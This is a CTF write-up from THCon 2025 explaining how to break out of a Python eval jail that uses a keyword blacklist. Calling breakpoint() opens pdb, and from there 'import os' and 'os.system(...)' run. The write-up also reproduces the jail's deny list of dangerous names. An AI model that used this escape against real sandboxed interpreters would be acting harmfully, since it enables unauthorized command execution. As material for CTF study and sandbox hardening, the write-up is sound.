# Jailbreak python
Solve time: 1h30. Made by wocsa for THCon 2025.
First step: get comfortable.
To facilitate the attack, let's make the jail more verbose: we print `traceback.format_exc()` when a command raises an error, and we print the "bad word" whenever a command is blocked:
```python
import traceback

def jail():
    banned_words = ["exec", "eval", "builtins", "getattr", "globals", "locals", "import", "os", "open", "__", "."]
    command = str(input(">>>"))
    # if any(bad in command for bad in banned_words):
    for bad in banned_words:
        if bad in command:
            print("Unauthorized command: " + f"contains {bad}")
            return
    try:
        print(eval(command))
    except Exception as e:
        # print("Invalid command " + str(e))
        print(traceback.format_exc())

while True:
    jail()
```
Another quality-of-life improvement is to run the script with `rlwrap` to get a terminal-like experience (up/down and left/right arrows):

```shell
rlwrap python3 jail.py
```
First impressions:

- The variable `banned_words` is reset at the start of the function ➡️ no point in trying to tamper with it.
- No method calls: `.` and `getattr` are banned.
- Importing is hard: `__`, `.` and `import` are banned.
- BUT! The builtins are not set to `None` as in the other hard challenges. Still, a lot of builtins are unusable because their names appear in the blacklist.
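Before poking at the real service, it can help to replicate the filter locally and probe candidate payloads against it. A minimal sketch, with `banned_words` copied from the challenge source above and a hypothetical `blocked` helper:

```python
# Local re-creation of the jail's blacklist check, for probing payloads
# offline before sending them to the real service.
banned_words = ["exec", "eval", "builtins", "getattr", "globals", "locals",
                "import", "os", "open", "__", "."]

def blocked(command):
    """Return the first banned substring found in `command`, or None if it passes."""
    return next((bad for bad in banned_words if bad in command), None)

print(blocked("().__class__"))     # blocked: contains '__' (and '.')
print(blocked("getattr(1, 'x')"))  # blocked: contains 'getattr'
print(blocked("breakpoint()"))     # None -> would reach eval()
```

This makes it quick to confirm that the classic `__class__`-chain tricks die on `__` and `.`, which is what pushes the search toward the builtins.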
So let's spend an hour on a "log-reading fireside evening", going through all of the Python built-in functions. The following may be useful:
- `eval`: banned, duhh.
- `exec`: banned.
- `open`: banned.
- `breakpoint`: … not banned? Wait? Seriously?
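Why is `breakpoint` such a big deal? Per PEP 553 it simply calls `sys.breakpointhook()`, which defaults to `pdb.set_trace()`: an interactive debugger prompt where the blacklist no longer filters anything. A quick sketch of that dispatch, swapping in a custom hook so it doesn't actually drop into pdb:

```python
import sys

# breakpoint() is just a dispatcher: it calls sys.breakpointhook(), which by
# default is pdb.set_trace() (PEP 553). Swap in a custom hook to observe the
# dispatch without entering an interactive debugger.
calls = []
sys.breakpointhook = lambda *args, **kwargs: calls.append("hook ran")
breakpoint()   # goes through our hook instead of dropping into pdb
print(calls)   # ['hook ran']
```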
So the attack is as simple as it gets:

```python
breakpoint()
```

Then, from the `pdb` prompt:

```python
import os
os.system(...)
```
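The pdb prompt executes anything that isn't a debugger command as Python in the trapped frame, with full builtins and no blacklist in sight. A non-interactive sketch of that post-breakpoint step, feeding the prompt scripted input (`marker` is just an illustrative variable name):

```python
import io
import pdb

# Simulate what an attacker types at the pdb prompt: "!" forces pdb to run
# the line as a Python statement in the current frame; "c" resumes execution.
fake_stdin = io.StringIO("!import os\n!marker = os.path.sep\nc\n")
debugger = pdb.Pdb(stdin=fake_stdin, stdout=io.StringIO(), readrc=False)
debugger.set_trace()
# Execution resumes here after "c"; `marker` was set from inside pdb,
# using the very `import` and `os` names the jail's blacklist forbids.
print(marker)
```

The same mechanism is what makes the real attack work: once `breakpoint()` fires inside `eval`, the attacker types `import os` and `os.system(...)` interactively, and the filter never sees those lines.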